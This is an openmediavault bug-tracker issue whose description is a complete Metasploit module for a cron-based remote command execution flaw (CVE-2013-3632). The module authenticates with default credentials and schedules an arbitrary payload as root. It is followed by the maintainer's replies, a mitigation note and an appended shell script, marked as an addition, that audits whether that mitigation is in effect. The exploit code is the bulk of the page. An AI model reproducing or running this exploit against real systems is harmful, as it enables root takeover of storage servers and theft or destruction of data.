2018-01-17 19:06 CET

ID: 0000907
Project: openmediavault
Category: Bug
View Status: public
Last Update: 2018-01-10 22:44
Reporter: Turgan
Assigned To: votdev
Priority: immediate
Severity: major
Reproducibility: N/A
Status: closed
Resolution: no change required
Product Version: Sardaukar (0.5.x)
Target Version:
Fixed in Version:
Summary: 0000907: OMV Cron Remote Command Execution Vulnerability Exploit
Description:
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info={})
    super(update_info(info,
      'Name' => 'OpenMediaVault Cron Remote Command Execution',
      'Description' => %q{
      OpenMediaVault allows an authenticated user to create cron jobs as arbitrary users on the system.
      An attacker can abuse this to run arbitrary commands as any user available on the system (including root).
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Brandon Perry <bperry.volatile[at]gmail.com>' # Discovery / msf module
        ],
      'References' =>
        [
          ['CVE', '2013-3632'],
          ['URL', 'https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats']
        ],
      'Privileged' => true,
      'DefaultOptions' => { 'WfsDelay' => 60 },
      'Payload' =>
      {
        'Compat' =>
        {
          'PayloadType' => 'cmd',
          'RequiredCmd' => 'generic perl ruby bash telnet python',
        }
      },
      'Platform' => ['unix', 'linux'],
      'Arch' => ARCH_CMD,
      'Targets' => [['Automatic',{}]],
      'DisclosureDate' => 'Oct 30 2013',
      'DefaultTarget' => 0
    ))
 
    register_options(
    [
      OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
      OptString.new('PASSWORD', [ false, "Password to authenticate with", 'openmediavault'])
    ], self.class)
  end
 
  def exploit
    init = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/index.php')
    })
 
    sess = init.get_cookies
    post = "{\"service\":\"Authentication\",\"method\":\"login\",\"params\":{\"username\":\"#{datastore["USERNAME"]}\",\"password\":\"#{datastore["PASSWORD"]}\"}}"
 
    login = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/rpc.php'),
      'data' => post,
      'ctype' => 'application/json',
      'cookie' => sess
    })
 
    if !login or login.code != 200
      fail_with("Login failed")
    end
 
    sess = login.get_cookies
    post = '{"service":"Cron","method":"set","params":{"enable":true,"minute":"*","hour":"*","dayofmonth":"*","month":"*","dayofweek":"*","username":"root","command":"'
    post << payload.encoded.gsub('"', '\"')
    post << '","comment":"","type":"userdefined","everynminute":false,"everynhour":false,"everyndayofmonth":false,"sendemail":false,"uuid":"undefined"}}'
 
    resp = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/rpc.php'),
      'data' => post,
      'ctype' => 'application/json',
      'cookie' => sess
    })
 
    if !resp or resp.code != 200
      fail_with("Posting cron failed.")
    end
 
    print_status("Waiting for connect-back, this will take up to a minute")
  end
end
 
Steps To Reproduce:
- use MSF
- bind the code
- you don't like to see this happen if your cron is old enough.
Additional Information: here is the main source
http://www.1337day.com/exploit/21421
Tags: No tags attached.

Notes

~0002593

votdev (administrator)

Last edited: 2013-11-23 22:53

I already know that issue, but it will not be fixed because it is a feature that was added to allow the user to create cron jobs that are executed as root user.
If it is removed there will be users that are really disappointed about that.

~0002594

votdev (administrator)

This vulnerability report is nonsense because you are also able to wipe whole devices or delete filesystems via webgui.

~0005103

votdev (administrator)

Last edited: 2018-01-10 22:44

Since openmediavault 0.5.32 it is possible to disable user root in cron jobs by setting the environment variable OMV_USERMGMT_ENUMERATE_USER_ROOT to FALSE in /etc/default/openmediavault. See https://github.com/openmediavault/openmediavault/commit/e9045daaedc973fa18525d63457eccac2926c734#diff-1030a4428d20248a6f7dd797db03967b.
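
One way to check on a host whether the mitigation from note 0005103 is in effect (an added example, not part of the original issue and not openmediavault's own code). The function names and verdict strings are hypothetical, and it assumes that only the literal value FALSE named in the note disables root.

```sh
# Added example: audit the cron-root mitigation; names here are hypothetical.

# True if dotted version $1 >= $2, compared numerically (0.5.9 < 0.5.32).
version_ge() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        n = split(a, x, "."); m = split(b, y, ".")
        for (i = 1; i <= (n > m ? n : m); i++) {
            if (x[i] + 0 > y[i] + 0) exit 0
            if (x[i] + 0 < y[i] + 0) exit 1
        }
        exit 0
    }'
}

# Print the effective OMV_USERMGMT_ENUMERATE_USER_ROOT value from a shell-style
# defaults file: commented lines are skipped, the last assignment wins, and a
# leading "export", a trailing comment and surrounding quotes are stripped.
omv_root_flag() {
    [ -r "$1" ] || return 0
    awk '
        { sub(/^[ \t]*(export[ \t]+)?/, "") }
        /^OMV_USERMGMT_ENUMERATE_USER_ROOT=/ {
            v = substr($0, index($0, "=") + 1)
            sub(/[ \t]+#.*$/, "", v); sub(/[ \t]+$/, "", v)
            gsub(/^["\047]|["\047]$/, "", v)
            last = v
        }
        END { print last }
    ' "$1"
}

# Usage: omv_cron_root_audit <installed-version> <defaults-file>
# Prints one verdict; returns 0 only when root is disabled for cron jobs.
omv_cron_root_audit() {
    if ! version_ge "$1" "0.5.32"; then
        echo "unsupported-version"; return 2   # setting not available before 0.5.32
    fi
    case $(omv_root_flag "$2") in
        FALSE) echo "root-disabled"; return 0 ;;
        "")    echo "root-allowed-unset"; return 1 ;;
        *)     echo "review-value"; return 1 ;;   # assumption: only literal FALSE counts
    esac
}

# Constructed sample: the setting is commented out, so root stays selectable.
sample=$(mktemp)
printf '%s\n' '# OMV_USERMGMT_ENUMERATE_USER_ROOT="FALSE"' > "$sample"
omv_cron_root_audit 0.5.32 "$sample" || true   # prints root-allowed-unset
rm -f "$sample"
```

On an installed system, pass the output of `dpkg-query -W -f='${Version}' openmediavault` as the version and `/etc/default/openmediavault` as the file.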

Issue History
Date Modified Username Field Change
2013-11-23 22:38 Turgan New Issue
2013-11-23 22:38 Turgan Status new => assigned
2013-11-23 22:38 Turgan Assigned To => votdev
2013-11-23 22:52 votdev Note Added: 0002593
2013-11-23 22:53 votdev Note Edited: 0002593
2013-11-23 23:23 votdev Note Added: 0002594
2013-11-23 23:23 votdev Status assigned => closed
2013-11-23 23:23 votdev Resolution open => fixed
2013-11-23 23:24 votdev Resolution fixed => no change required
2018-01-10 22:42 votdev Note Added: 0005103
2018-01-10 22:44 votdev Note Edited: 0005103